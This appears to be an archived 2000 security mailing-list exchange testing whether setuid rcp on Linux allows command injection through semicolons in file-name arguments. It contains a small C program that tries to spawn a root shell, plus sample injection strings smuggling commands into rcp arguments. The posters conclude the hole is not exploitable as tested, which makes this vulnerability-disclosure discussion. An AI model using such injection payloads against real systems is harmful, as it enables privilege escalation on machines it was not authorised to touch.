Re: possible rcp hole...

[H D Moore <hdm () SECUREAUSTIN COM>]

On SuSE 6.4 rcp is not vulnerable. I replaced /bin/sh with this program:

--- ubersh.c ---
#include <stdio.h>
#include <stdlib.h>


int main (int argc, char **argv)
{
        setuid(0);
        seteuid(0);
        setreuid(0);
        execl("/bin/bash", "uber shell", "-i", NULL);
        printf("exiting root shell...\n");
        return 0;
}
--------------

The rcp program executed my shell with:

$ rcp 'file1 file2;' 127.0.0.1

Which dopped me into the ubersh, where my privs were still that of my user
account.  I am pretty sure rcp drops privs before calling anything (only uses
it for the port bindings), let alone system, or we would have heard something
about this before.

This is still a cool hole if you can find some custom/scripted system that
does rcp backups from user-writable directories.  You could gain access as
whatever user the backups ran as (likely to be priviledged).

-HD

http://www.digitaldefense.net
http://www.digitaloffense.net


On Tuesday 21 November 2000 04:11 pm, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I
> haven't had much time to play with this, because exama are coming up.
>
> It is negated because system() calls /bin/cp which with the newer
> versions of bash, it drops it's effective credientals...
>
> $ ls -alF  `which rcp`
> -rwsr-xr-x    1    root    root        14492    Jul 21 22:43
> /usr/sbin/rcp
>
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina;  /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun
> stuff. This could probably be exploited, on older bash bersions?